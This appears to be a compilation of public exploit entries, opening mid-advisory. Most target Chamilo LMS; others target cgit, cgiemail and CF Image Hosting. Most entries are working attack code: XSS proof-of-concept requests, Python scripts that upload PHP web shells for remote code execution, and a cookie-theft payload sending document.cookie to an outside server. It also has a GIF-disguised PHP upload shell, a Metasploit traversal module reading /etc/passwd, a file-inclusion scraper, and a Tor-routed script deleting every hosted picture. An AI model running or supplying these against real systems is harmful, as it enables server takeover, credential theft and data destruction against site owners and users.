Software: Chamilo LMS
Version: 1.9.10 and Prior
Solution (Fix): Upgrade to 1.9.11 (https://github.com/chamilo/chamilo-lms/)
VII. Vendor Response/Solution
========================================================
Vendor Contacted : 02/12/2015
Vendor Response : 02/12/2015
Patch Release: 03/17/2015
Advisory Release: 03/18/2015
VIII.Credits
========================================================
Discovered by Rehan Ahmed
knight_rehan@hotmail.com
# Exploit Title: Chamilo LMS 1.11.8 - Cross-Site Scripting
# Author: Cakes
# Discovery Date: 2018-10-05
# Vendor Homepage: https://chamilo.org
# Software Link: https://github.com/chamilo/chamilo-lms/releases/download/v1.11.8/chamilo-1.11.8-php5.zip
# Tested Version: 1.11.8 for php5
# Tested on OS: Kali Linux
# CVE: N/A
# Description:
# Improper input validation on the Calendar / Personal Agenda page allows attackers add a persistent
# Cross-Site scripting attack to the meeting's content field when adding a new meeting.
# Simply intercept a new meeting request and add in the XSS
# PoC
GET /chamillo/main/inc/ajax/agenda.ajax.php?type=personal&a=add_event&start=2018-10-05%2000:00:00&end=2018-10-06%2000:00:00&all_day=true&view=month&title=Important+Info&content=%3Cp%3E<script>alert("Cakes");</script>%3C%2Fp%3E%0D%0A&_qf__form= HTTP/1.1
Host: 10.0.0.16
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: http://10.0.0.16/chamillo/main/calendar/agenda_js.php?type=personal
Cookie: defaultMyCourseView3=0; ch_sid=04uo1hmqp7e49f8l36e6s9oit1; agenda_cookies={%22view%22:%22month%22%2C%22start%22:%222018-10-01%22}
Connection: close
# Exploit Title: Chamilo LMS 1.11.8 - 'firstname' Cross-Site Scripting
# Author: Cakes
# Discovery Date: 2018-10-06
# Vendor Homepage: https://chamilo.org
# Software Link: https://github.com/chamilo/chamilo-lms/releases/download/v1.11.8/chamilo-1.11.8-php5.zip
# Tested Version: 1.11.8 for php5
# Tested on OS: Kali Linux
# CVE: N/A
# Description:
# Improper input validation on the Firstname and Lastname fields allow attackers to add a persistent
# Cross-Site scripting attack when registering as a new user
# Simply intercept a new registration request and add in the XSS in the firstname / lastname fields.
# I'm sure there are more exploit vectors on this software. No time to check, had to move along.
# PoC
POST /chamillo/main/auth/inscription.php HTTP/1.1
Host: 10.0.0.16
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://10.0.0.16/chamillo/main/auth/inscription.php
Cookie: ch_sid=ac092r01e7cnoco62rejshocq4
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213
status=5&firstname=<script>alert("Cakes");</script>&lastname=<script>alert("Cakes");</script>&email=cakes%40testers.com&username=cakez&pass1=123456&pass2=123456&phone=&language=english&official_code=&extra_skype=&extra_linkedin_url=&submit=&_qf__registration=&item_id=0
# Exploit Title: Chamilo LMS 1.11.24 - Remote Code Execution (RCE)
# Exploit Author: 0x00-null - Mohamed Kamel BOUZEKRIA
# Exploit Date: September 3, 2024
# Vendor Homepage: https://chamilo.org/
# Software Link: https://chamilo.org/
# Version: 1.11.24 (Beersel)
# Tested Versions: 1.11.24 (Beersel) - August 31, 2023
# CVE ID: CVE-2023-4220
# Vulnerability Type: Remote Code Execution
# Description: Unauthenticated remote code execution in Chamilo LMS <= 1.11.24 due to an unrestricted file upload vulnerability.
# Proof of Concept: Yes
# Categories: Web Application, Remote Code Execution, File Upload
# CVSS Score: 8.1 (High)
# CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
# Notes: Ensure that the /main/inc/lib/javascript/bigupload/files/ directory exists and is writable.
# License: MIT License
# References:
# - CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4220
# - Exploit Documentation: https://github.com/0x00-null/Chamilo-CVE-2023-4220-RCE-Exploit
# - Vendor Advisory: https://chamilo.org/
import requests
import argparse
from urllib.parse import urljoin
def upload_shell(target_url, payload_name):
upload_url = urljoin(target_url, "main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported")
shell_path = f"/main/inc/lib/javascript/bigupload/files/{payload_name}"
shell_url = urljoin(target_url, shell_path)
# Payload containing the PHP web shell
files = {'bigUploadFile': (payload_name, '<?php system($_GET["cmd"]); ?>', 'application/x-php')}
# Upload the payload
response = requests.post(upload_url, files=files)
if response.status_code == 200:
print("[+] File uploaded successfully!")
print(f"[+] Access the shell at: {shell_url}?cmd=")
else:
print("[-] File upload failed.")
def execute_command(shell_url, cmd):
# Execute the command
response = requests.get(f"{shell_url}?cmd={cmd}")
if response.status_code == 200:
print(f"[+] Command Output:\n{response.text}")
else:
print(f"[-] Failed to execute command at {shell_url}")
if __name__ == "__main__":
# Parse command-line arguments
parser = argparse.ArgumentParser(description="CVE-2023-4220 Chamilo LMS Unauthenticated File Upload RCE Exploit")
parser.add_argument('target_url', help="The target base URL of the Chamilo LMS instance (e.g., http://example.com/)")
parser.add_argument('cmd', help="The command to execute on the remote server")
parser.add_argument('--shell', default='rce.php', help="The name of the shell file to be uploaded (default: rce.php)")
args = parser.parse_args()
# Run the exploit with the provided arguments
upload_shell(args.target_url, args.shell)
# Form the shell URL to execute commands
shell_url = urljoin(args.target_url, f"main/inc/lib/javascript/bigupload/files/{args.shell}")
execute_command(shell_url, args.cmd)
# Exploit Title: Chamilo LMS 1.11.14 - Remote Code Execution (Authenticated)
# Date: 13/05/2021
# Exploit Author: M. Cory Billington (@_th3y)
# Vendor Homepage: https://chamilo.org
# Software Link: https://github.com/chamilo/chamilo-lms
# Version: 1.11.14
# Tested on: Ubuntu 20.04.2 LTS
# CVE: CVE-2021-31933
# Writeup: https://theyhack.me/CVE-2021-31933-Chamilo-File-Upload-RCE/
from requests import Session
from random import choice
from string import ascii_lowercase
import requests
# This is all configuration stuff,
url = "http://127.0.0.1/chamilo-lms/" # URL to remote host web root
user_name = "admin" # User must be an administrator
password = "admin"
command = "id;whoami"
# Where you want to upload your webshell. Must be writable by web server user.
# This spot isn't protectec by .htaccess
webshell_path = 'web/'
webshell_name = f"shell-{''.join(choice(ascii_lowercase) for _ in range(6))}.phar" # Just a random name for webshell file
content = f"<?php echo `{command}`; ?>"
def main():
# Run a context manager with a session object to hold login session after login
with Session() as s:
login_url = f"{url}index.php"
login_data = {
"login": user_name,
"password": password
}
r = s.post(login_url, data=login_data) # login request
# Check to see if login as admin user was successful.
if "admin" not in r.url:
print(f"[-] Login as {user_name} failed. Need to be admin")
return
print(f"[+] Logged in as {user_name}")
print(f"[+] Cookie: {s.cookies}")
file_upload_url = f"{url}main/upload/upload.php"
# The 'curdirpath' is not santitized, so I traverse to the '/var/www/html/chamilo-lms/web/build' directory. I can upload to /tmp/ as well
php_webshell_file = {
"curdirpath": (None, f"/../../../../../../../../../var/www/html/chamilo-lms/{webshell_path}"),
"user_upload": (webshell_name, content)
}
## Good command if you want to see what the request looks like without sending
# print(requests.Request('POST', file_upload_url, files=php_webshell_file).prepare().body.decode('ascii'))
# Two requests required to actually upload the file
for i in range(2):
s.post(file_upload_url, files=php_webshell_file)
exploit_request_url = f"{url}{webshell_path}{webshell_name}"
print("[+] Upload complete!")
print(f"[+] Webshell: {exploit_request_url}")
# This is a GET request to the new webshell to trigger code execution
command_output = s.get(exploit_request_url)
print("[+] Command output:\n")
print(command_output.text)
if __name__ == "__main__":
main()
# Exploit Title: Chamilo LMS 1.11.14 - Account Takeover
# Date: July 21 2021
# Exploit Author: sirpedrotavares
# Vendor Homepage: https://chamilo.org
# Software Link: https://chamilo.org
# Version: Chamilo-lms-1.11.x
# Tested on: Chamilo-lms-1.11.x
# CVE: CVE-2021-37391
#Publication:
https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chamilo-lms-1.11.14-xss-vulnerabilities
Description: A user without privileges in Chamilo LMS 1.11.x can send an
invitation message to another user, e.g., the administrator, through
main/social/search.php,
main/inc/lib/social.lib.php and steal cookies or execute arbitrary code on
the administration side via a stored XSS vulnerability via social network
the send invitation feature. .
CVE ID: CVE-2021-37391
CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N
URL:
https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chamilo-lms-1.11.14-xss-vulnerabilities
Affected parameter: send private message - text field
Payload: <img src=x onerror=this.src='
http://yourserver/?c='+document.cookie>
Steps to reproduce:
1. Navigate to the social network menu
2. Select the victim profile
3. Add the payload on the text field
4. Submit the request and wait for the payload execution
*Impact:* By using this vulnerability, an unprivileged user can steal
cookies from an admin account or force the administrator to create an
account with admin privileges with an HTTP 302 redirect.
*Mitigation*: Update the Chamilo to the latest version.
*Fix*:
https://github.com/chamilo/chamilo-lms/commit/de43a77049771cce08ea7234c5c1510b5af65bc8
Com os meus melhores cumprimentos,
--
*Pedro Tavares*
Founder and Editor-in-Chief at seguranca-informatica.pt
Co-founder of CSIRT.UBI
Creator of 0xSI_f33d <https://feed.seguranca-informatica.pt/>
seguranca-informatica.pt | @sirpedrotavares
<https://twitter.com/sirpedrotavares> | 0xSI_f33d
<https://feed.seguranca-informatica.pt/>
Document Title:
===============
Chamilo LMS - Persistent Cross Site Scripting Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=1727
Video: https://www.youtube.com/watch?v=gNZsQjmtiGI
Release Date:
=============
2016-02-17
Vulnerability Laboratory ID (VL-ID):
====================================
1727
Common Vulnerability Scoring System:
====================================
3.3
Product & Service Introduction:
===============================
Chamilo is an open-source (under GNU/GPL licensing) e-learning and content management system, aimed at improving access to education and knowledge globally.
It is backed up by the Chamilo Association, which has goals including the promotion of the software, the maintenance of a clear communication channel and
the building of a network of services providers and software contributors.
The Chamilo project aims at ensuring the availability and quality of education at a reduced cost, through the distribution of its software free of charge,
the improvement of its interface for 3rd world countries devices portability and the provision of a free access public e-learning campus.
(Copy of the Homepage: https://chamilo.org/chamilo-lms/ )
Abstract Advisory Information:
==============================
A persistent cross site scripting vulnerability has been discoverd in the official web-application Product Chamilo LMS.
Vulnerability Disclosure Timeline:
==================================
2016-02-17: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A GET cross site scripting web vulnerability has been discovered in the official Netlife Photosuite Pro Content Management System.
A vulnerability allows remote attackers to inject malicious script codes on the client-side of the affected web-application.
The vulnerability is located in the `title` input field of the `work/upload.php` file. Remote attackers are able to inject own
malicious script codes to the client-side of the affected web-application. The request method to inject is POST and the attack
vector is client-side. The attacker injects the payload in the vulnerable input field to execute the code in view.php.
The security risk of the client-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.3.
Exploitation of the non-persistent cross site scripting web vulnerability requires low privileged web-application user account and low user interaction.
Successful exploitation results in session hijacking, persistent phishings attacks, persistent external redirect and malware loads or persistent
manipulation of affected or connected module context.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] work/
Vulnerable File(s):
[+] upload.php
[+] view.php
Vulnerable Parameter(s):
[+] title
Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without web-application user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Users goes to [ Course name > Assignments > ]
2. users will follow the [Assignments] made by Course Trainer or admin of Chamilo platform .
3. Users will click on button titled as [ upload My Assignments] .
4. an upload Document is Shown and A parameter [ Title ] is vulnerable to POC Payload ["><iframe src=http://vulnerability-lab.com >]
5. when trainer or admin view Assignments of user, code is executed successfully
--- PoC Session Logs [POST] ---
POST /site/main/work/upload.php?cidReq=[Course name]&id_session=0&gidReq=0&gradebook=0&origin=&id=1 HTTP/1.1
Host: chamilo.org
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: defaultMyCourseView15=0; __cfduid=dcb5fdb8a71117667369addf2c390449a331452648620; ch_sid=9daew954ef087c82cb0cab6037949478e
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------206976886318079499742071692496
Content-Length: 1482
-----------------------------206976886318079499742071692496
Content-Disposition: form-data; name="title"
[<Persistent Code Injection>]
-----------------------------206976886318079499742071692496
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream
-----------------------------206976886318079499742071692496
Content-Disposition: form-data; name="description"
<p>really thats out of brain</p>
-----------------------------206976886318079499742071692496
Content-Disposition: form-data; name="submitWork"
-----------------------------206976886318079499742071692496
Content-Disposition: form-data; name="_qf__form"
-----------------------------206976886318079499742071692496
Content-Disposition: form-data; name="contains_file"
0
-----------------------------206976886318079499742071692496
Content-Disposition: form-data; name="active"
1
-----------------------------206976886318079499742071692496
Content-Disposition: form-data; name="accepted"
1
-----------------------------206976886318079499742071692496
Content-Disposition: form-data; name="MAX_FILE_SIZE"
134217728
-----------------------------206976886318079499742071692496
Content-Disposition: form-data; name="id"
1
-----------------------------206976886318079499742071692496
Content-Disposition: form-data; name="sec_token"
435ad99d48d0fe2e6bed594707dffc1d
-----------------------------206976886318079499742071692496--
Security Risk:
==============
The security risk of the persistent cross site script vulnerability in the web-application is estimated as medium. (CVSS 3.3)
Credits & Authors:
==================
Lawrence Amer - ( http://www.vulnerability-lab.com/show.php?user=Lawrence%20Amer )
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
# Exploit Title: Chamillo LMS 1.11.8 - Arbitrary File Upload
# Google Dork: "powered by chamilo"
# Date: 2018-10-05
# Exploit Author: Sohel Yousef jellyfish security team
# Software Link: https://chamilo.org/en/download/
# Version: Chamilo 1.11.8 or lower to 1.8
# Category: webapps
# 1. Description
# Any registered user can upload files and rename and change the file type to
# php5 or php7 by ckeditor module in my files section
# register here :
# http://localhost/chamilo//main/auth/inscription.php
# after registration you can view this sections
# http://localhost/chamilo/main/social/myfiles.php
# http://localhost/chamilo/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0
# upload your shell in gif format and then rename the format
# if the rename function was desabled and add this GIF89;aGIF89;aGIF89;a before <?PHP
# to be like this for examlple
GIF89;aGIF89;aGIF89;a<html>
<head>
<title>PHP Test</title>
<form action="" method="post" enctype="multipart/form-data">
<input type="file" name="fileToUpload" id="fileToUpload">
<input type="submit" value="upload file" name="submit">
</form>
</head>
<body>
<?php echo '<p>FILE UPLOAD</p><br>';
$tgt_dir = "uploads/";
$tgt_file = $tgt_dir.basename($_FILES['fileToUpload']['name']);
echo "<br>TARGET FILE= ".$tgt_file;
//$filename = $_FILES['fileToUpload']['name'];
echo "<br>FILE NAME FROM VARIABLE:- ".$_FILES["fileToUpload"]["name"];
if(isset($_POST['submit']))
{
if(file_exists("uploads/".$_FILES["fileToUpload"]["name"]))
{ echo "<br>file exists, try with another name"; }
else {
echo "<br>STARTING UPLOAD PROCESS<br>";
if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"],
$tgt_file))
{ echo "<br>File UPLOADED:- ".$tgt_file; }
else { echo "<br>ERROR WHILE UPLOADING FILE<br>"; }
}
}
?>
</body>
</html>
# and uplaod it as php.gif
# you can browse the files form right click and click on browse option
# Title: cgit 1.2.1 - Directory Traversal (Metasploit)
# Author: Dhiraj Mishra
# Software: cgit
# Link: https://git.zx2c4.com/cgit/
# Date: 2018-08-14
# CVE: CVE-2018-14912
# This module exploits a directory traversal vulnerability which exists
# in cgit < 1.2.1 cgit_clone_objects(), reachable when the configuration
# flag enable-http-clone is set to 1 (default).
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'cgit Directory Traversal',
'Description' => %q{
This module exploits a directory traversal vulnerability which
exists in cgit < 1.2.1 cgit_clone_objects(), reachable when the
configuration flag enable-http-clone is set to 1 (default).
},
'References' =>
[
['CVE', '2018-14912'],
['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1627'],
['EDB', '45148']
],
'Author' =>
[
'Google Project Zero', # Vulnerability discovery
'Dhiraj Mishra' # Metasploit module
],
'DisclosureDate' => 'Aug 03 2018',
'License' => MSF_LICENSE
))
register_options(
[
OptString.new('FILEPATH', [true, "The path to the file to read", '/etc/passwd']),
OptString.new('TARGETURI', [true, "The base URI path of the cgit install", '/cgit/']),
OptString.new('REPO', [true, "Git repository on the remote server", '']),
OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 10 ])
])
end
def run_host(ip)
filename = datastore['FILEPATH']
traversal = "../" * datastore['DEPTH'] << filename
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, datastore['REPO'], '/objects/'),
'vars_get' => {'path' => traversal}
})
unless res && res.code == 200
print_error('Nothing was downloaded')
return
end
vprint_good("#{peer} - \n#{res.body}")
path = store_loot(
'cgit.traversal',
'text/plain',
ip,
res.body,
filename
)
print_good("File saved in: #{path}")
end
end
There is a directory traversal vulnerability in cgit_clone_objects(), reachable when the configuration flag enable-http-clone is set to 1 (default):
void cgit_clone_objects(void)
{
if (!ctx.qry.path) {
cgit_print_error_page(400, "Bad request", "Bad request");
return;
}
if (!strcmp(ctx.qry.path, "info/packs")) {
print_pack_info();
return;
}
send_file(git_path("objects/%s", ctx.qry.path));
}
send_file() is a function that simply sends the data stored at the given filesystem path out over the network.
git_path() partially rewrites the provided path and e.g. prepends the base path of the repository, but it does not sanitize the provided path to prevent directory traversal.
ctx.qry.path can come from querystring_cb(), which takes unescaped data from the querystring. To trigger this case:
$ curl http://127.0.0.1/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
#!/usr/bin/env perl
# Exploit Title: cgiemail local file inclusion
# Vendor Homepage: http://web.mit.edu/wwwdev/cgiemail/webmaster.html
# Software Link: http://web.mit.edu/wwwdev/cgiemail/cgiemail-1.6.tar.gz
# Version: 1.6 and older
# Date: 2016-09-27
# cgiecho a script included with cgiemail will return any file under a
# websites document root if the file contains square brackets and the text
# within the brackets is guessable.
# cgiemail is currently shipped with cPanel and is enabled by default.
# Example: http://hostname/cgi-sys/cgiecho/login.php?'pass'=['pass']
# will display http://hostname/login.php if login.php contains $_POST['pass']
##
# cgiemail local file inclusion exploit
# Author: Finbar Crago <finbar.crago@gmail.com>
# https://github.com/finbar-crago/cgiemail-exploit
##
use strict;
use warnings;
use POSIX;
use LWP::UserAgent;
use HTML::Entities;
use Getopt::Long;
$|++; $\="\n"; $,=" ";
sub usage {
die <<"EOF";
cgiemail local file inclusion exploit
Usage: $0 [options] target
Options:
--names Check for names in commer separated list
--num Check for numbers
--num-max Maximum number to check (default 10)
--batch Number of arguments sent per request (default 10)
--cgiecho-path Path of cgiecho on server (default '/cgi-sys/cgiecho/')
--user-agent Set user-agent (default 'Mozilla/5.0')
--deley Pause between requests in seconds (default 1)
--timeout Set connection timeout (default 10)
Example:
$0 --num --names 'email,password' http://hostname/login.php > login.php
EOF
}
my $names;
my $num = 0;
my $num_max = 10;
my $batch = 10;
my $cgiecho_path = '/cgi-sys/cgiecho';
my $user_agent = 'Mozilla/5.0';
my $timeout = 10;
my $deley = 1;
GetOptions(
'names=s' => \$names,
'num' => \$num,
'num-max=i' => \$num_max,
'batch=i' => \$batch,
'cgiecho-path' => \$cgiecho_path,
'user-agent=s' => \$user_agent,
'deley=i' => \$deley,
'timeout=i' => \$timeout,
);
usage unless
defined $ARGV[0] &&
$ARGV[0] =~ m|^(https?://)?([a-z\d.-]+)/?(.*)?|i;
my $conn=$1||'http://';my $host=$2;my $path=$3||'index.php';
my $url = "$conn$host/$cgiecho_path/$path";
my @list= ();
if($num){ push @list, $_ for 0..$num_max }
if($names){
push @list, "%22$_%22","%27$_%27" for split/,/,$names;
}
my $ua = LWP::UserAgent->new;
$ua->agent($user_agent);
$ua->timeout($timeout);
$batch--;
my $i=0;
my $end = ceil($#list/$batch);
while($#list+1){
my $args='?';
my $to = ($#list > $batch)?$batch:$#list;
$args.="$_=[$_]&" for @list[0..$to];
@list = @list[$to+1..$#list];
my $res = $ua->get($url.$args);
die $res->status_line if !$res->content_is_html;
my $html = $res->decoded_content;
if($html !~ />cgiemail[\n\r ]*([\d.]+)/){
print "cgiemail not found" if !$i;
print "cgiemail was here but now it's not..." if $i;
exit -1;
} print STDERR "detected cgiemail $1" if !$i;
print STDERR "\e[Jrequest ".++$i." of $end...";
if($res->code == 200){
$html =~ m|<PRE>(.+)</PRE>|s;
print decode_entities($1);
print STDERR "success!";
exit;
}
if($res->code == 500){
if($html =~ m|500 Could not open template - No such file or directory|){
print STDERR "the file /$path doesn't exist...";
}
elsif($html =~ m|500 Empty template file|){
print STDERR "/$path is a directory...";
}
else{
print STDERR "unknown 500 error:";
print STDERR $html;
}
exit -1;
}
select(undef,undef,undef,$deley); printf "\eM";
}
print STDERR "sorry, no match found for $path";
exit -1;
#!/usr/bin/env python
"""
Exploit Title: CF Image Hosting Script 1.6.5: Delete database
Google Dork: "Powered By CF Image Hosting script"
Date: 01/08/2019
Exploit Author: David Tavarez
Vendor Homepage: https://davidtavarez.github.io/
Software Link: http://forum.codefuture.co.uk/showthread.php?tid=73141
Version: 1.6.5
Tested on: Debian 9.6
By default, the database can be downloaded by any user. After decoding
the file the database should be unserialize. The DELETE ID is stored
in Plain Text, this ID can be use to delete a picture.
$ virtualenv cfexploit
$ source cfexploit/bin/activate
$ pip install phpserialize
$ pip install PySocks
$ python exploit.py http://127.0.0.1:8000
[-] Target: http://127.0.0.1:8000/
[-] Downloading the database...
[+] Decoding database...
[-] Finding pictues...
[+] Pictures found: 3
[+] Ready... let's do this! Deleting all pictures...
[+] Done.
"""
import phpserialize
import base64
import socks
import socket
import sys
def create_connection(address, timeout=None, source_address=None):
sock = socks.socksocket()
sock.connect(address)
return sock
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9150)
# patch the socket module
socket.socket = socks.socksocket
socket.create_connection = create_connection
import urllib2
if __name__ == '__main__':
if len(sys.argv) == 1:
print "ERROR: Provide a valid URL"
sys.exit(-1)
url = sys.argv[1]
ids = []
try:
print "[+] Target: {}".format(url)
print "[+] Downloading the database..."
response = urllib2.urlopen("{}/upload/data/imgdb.db".format(url))
print "[+] Decoding database..."
with open("imgdb.db.txt", "w+") as f:
f.write(base64.b64decode(response.read()))
print "[+] Finding pictues..."
for key, value in phpserialize.load(file("imgdb.db.txt")).iteritems():
ids.append(value.get('deleteid'))
print "[+] Pictures found: {}".format(len(ids))
print "[+] Ready... let's do this! Deleting all pictures..."
for id in ids:
urllib2.urlopen("{}/?d={}".format(url, id))
print "[+] Done."
except urllib2.URLError, ex:
if ex.reason == "Forbidden":
print "[-] ERROR: this version is not vulnerable."
except EOFError, e:
raise e